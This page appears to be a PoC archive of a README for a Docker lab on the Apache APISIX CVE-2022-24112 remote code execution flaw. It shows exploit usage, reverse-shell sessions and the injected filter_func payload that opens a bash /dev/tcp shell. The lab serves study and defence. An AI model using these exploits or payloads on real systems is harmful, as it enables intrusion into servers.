关联漏洞
标题:Apache APISIX 安全漏洞 (CVE-2022-24112)Description:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX 中存在安全漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin Api的限制。 以下产品及版本受到影响:Apache APISIX 2.10.4 之前版本、Apache APISIX 2.12.1 之前
Description
Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab
介绍
# Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab
Let's clone using gitclone this repository, then we can navigate to `apisix-docker/examples`. In this `docker-compose.yml` file, we already change into `image: apache/apisix:2.12.0-alpine`, because the vulnerability in this version, then let's install using docker compose.
QuickStart via docker-compose,we can start all modules with docker-compose.
```bash
$ cd example
$ docker-compose -p docker-apisix up -d
```
Let's use this command `docker ps -a` to make sure the docker images already runs in the background. after this is done, we can access the API with a simple `curl`
```bash
$ curl 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Sun, 20 Mar 2022 15:49:17 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600
{"count":0,"action":"get","node":{"key":"\/apisix\/routes","nodes":{},"dir":true}}
```
- `poc.py`. exploit usage `python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444`
```bash
$ python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444
. ,
_.._ * __*\./ ___ _ \./._ | _ *-+-
(_][_)|_) |/'\ (/,/'\[_)|(_)| |
| |
(CVE-2022-24112)
{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }
```
reverse shell connection
```bash
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52334
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x 1 root root 4096 Mar 20 15:48 .
drwxr-xr-x 1 root root 4096 Jan 28 09:06 ..
drwxr-xr-x 13 root root 4096 Jan 28 09:07 apisix
drwx------ 2 nobody root 4096 Mar 20 15:48 client_body_temp
drwxr-xr-x 1 root root 4096 Mar 20 15:48 conf
drwxr-xr-x 5 root root 4096 Jan 28 09:07 deps
drwx------ 2 nobody root 4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x 2 1000 1000 4096 Mar 20 15:48 logs
drwx------ 2 nobody root 4096 Mar 20 15:48 proxy_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 scgi_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 uwsgi_temp
```
- `poc2.py`. exploit usage `python3 poc2.py -h`
```bash
$ python3 poc2.py -h
>> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
>> by twseptian
usage: poc2.py [-h] -t TARGET_IP -p TARGET_PORT -L LOCALHOST -P LOCALPORT
Apache APISIX 2.12.1 - Remote Code Execution (RCE)
optional arguments:
-h, --help show this help message and exit
-t TARGET_IP, --rhost TARGET_IP
Target IP
-p TARGET_PORT, --rport TARGET_PORT
Target Port
-L LOCALHOST, --lhost LOCALHOST
Localhost/Local IP
-P LOCALPORT, --lport LOCALPORT
Localport
```
exploit usage `python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444`
```bash
$ python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444
>> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
>> by twseptian
[!] Take RCE
listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52372
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x 1 root root 4096 Mar 20 15:48 .
drwxr-xr-x 1 root root 4096 Jan 28 09:06 ..
drwxr-xr-x 13 root root 4096 Jan 28 09:07 apisix
drwx------ 2 nobody root 4096 Mar 20 15:48 client_body_temp
drwxr-xr-x 1 root root 4096 Mar 20 15:48 conf
drwxr-xr-x 5 root root 4096 Jan 28 09:07 deps
drwx------ 2 nobody root 4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x 2 1000 1000 4096 Mar 20 15:48 logs
drwx------ 2 nobody root 4096 Mar 20 15:48 proxy_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 scgi_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 uwsgi_temp
```
```bash
$ curl -s 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' | jq
{
"count": 1,
"action": "get",
"node": {
"key": "/apisix/routes",
"nodes": [
{
"modifiedIndex": 161,
"value": {
"priority": 0,
"uri": "/rms/fzxewh",
"status": 1,
"upstream": {
"hash_on": "vars",
"pass_host": "pass",
"nodes": {
"schmidt-schaefer.com": 1
},
"type": "roundrobin",
"scheme": "http"
},
"id": "index",
"create_time": 1647791428,
"filter_func": "function(vars) os.execute('bash -c \\\"0<&160-;exec 160<>/dev/tcp/172.18.0.1/4444;/bin/sh <&160 >&160 2>&160\\\"'); return true end",
"update_time": 1647799320,
"name": "wthtzv"
},
"key": "/apisix/routes/index",
"createdIndex": 16
}
],
"dir": true
}
}
```
## Credits
- [Apache APISIX Docker - Manual deploy apisix via docker](https://github.com/apache/apisix-docker)
- [Apache APISIX < 2.12.1 Remote Code Execution](https://kavigihan.medium.com/apache-apisix-2-12-1-remote-code-execution-5f920b22ccff)
- [Exploit-DB - Apache APISIX 2.12.1 - Remote Code Execution (RCE)](https://www.exploit-db.com/exploits/50829)
- [GitHub - Apache APISIX Remote Code Execution (CVE-2022-24112) Exploit](https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112)
文件快照
[4.0K] /data/pocs/c3149bb1f0010018d00de7d542c1f914e0433d97
├── [4.0K] apisix-docker
│ ├── [4.0K] all-in-one
│ │ ├── [4.0K] apisix
│ │ │ ├── [1.1K] config.yaml
│ │ │ └── [3.6K] Dockerfile
│ │ └── [4.0K] apisix-dashboard
│ │ ├── [2.1K] conf.yaml
│ │ └── [5.2K] Dockerfile
│ ├── [4.0K] alpine
│ │ ├── [2.7K] Dockerfile
│ │ ├── [4.0K] hooks
│ │ │ └── [ 942] build
│ │ └── [ 276] README.MD
│ ├── [4.0K] alpine-dev
│ │ └── [2.2K] Dockerfile
│ ├── [4.0K] alpine-local
│ │ └── [2.6K] Dockerfile
│ ├── [4.0K] centos
│ │ ├── [1.5K] Dockerfile
│ │ └── [4.0K] hooks
│ │ └── [ 942] build
│ ├── [4.0K] compose
│ │ ├── [1.5K] dashboard-compose.yaml
│ │ └── [1.6K] docker-compose.yaml
│ ├── [4.0K] dashboard
│ │ ├── [2.2K] Dockerfile.alpine
│ │ ├── [2.2K] Dockerfile.centos
│ │ └── [ 217] README.md
│ ├── [4.0K] docs
│ │ └── [4.0K] en
│ │ └── [4.0K] latest
│ │ ├── [1.4K] build.md
│ │ ├── [ 157] config.json
│ │ ├── [2.8K] example.md
│ │ └── [2.7K] manual.md
│ ├── [4.0K] example
│ │ ├── [4.0K] apisix_conf
│ │ │ └── [1.8K] config.yaml
│ │ ├── [4.0K] apisix_log
│ │ ├── [4.0K] dashboard_conf
│ │ │ └── [3.9K] conf.yaml
│ │ ├── [2.1K] docker-compose-alpine.yml
│ │ ├── [2.3K] docker-compose-arm64.yml
│ │ ├── [2.8K] docker-compose.yml
│ │ ├── [4.0K] etcd_conf
│ │ │ └── [4.2K] etcd.conf.yml
│ │ ├── [4.0K] grafana_conf
│ │ │ ├── [4.0K] config
│ │ │ │ └── [ 26K] grafana.ini
│ │ │ ├── [4.0K] dashboards
│ │ │ │ └── [ 52K] apisix-grafana-dashboard.json
│ │ │ └── [4.0K] provisioning
│ │ │ ├── [4.0K] dashboards
│ │ │ │ └── [ 958] all.yaml
│ │ │ └── [4.0K] datasources
│ │ │ └── [ 955] all.yaml
│ │ ├── [4.0K] mkcert
│ │ │ ├── [1.7K] lvh.me+1-key.pem
│ │ │ ├── [1.5K] lvh.me+1.pem
│ │ │ ├── [ 204] README.md
│ │ │ ├── [2.4K] rootCA-key.pem
│ │ │ └── [1.6K] rootCA.pem
│ │ ├── [4.0K] prometheus_conf
│ │ │ └── [1.6K] prometheus.yml
│ │ └── [4.0K] upstream
│ │ ├── [ 372] web1.conf
│ │ └── [ 372] web2.conf
│ ├── [ 11K] LICENSE
│ ├── [ 444] MAINTAINING.md
│ ├── [8.8K] Makefile
│ └── [4.0K] README.md
├── [4.0K] poc
│ ├── [4.2K] poc2.py
│ └── [2.9K] poc.py
└── [6.2K] README.md
30 directories, 45 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。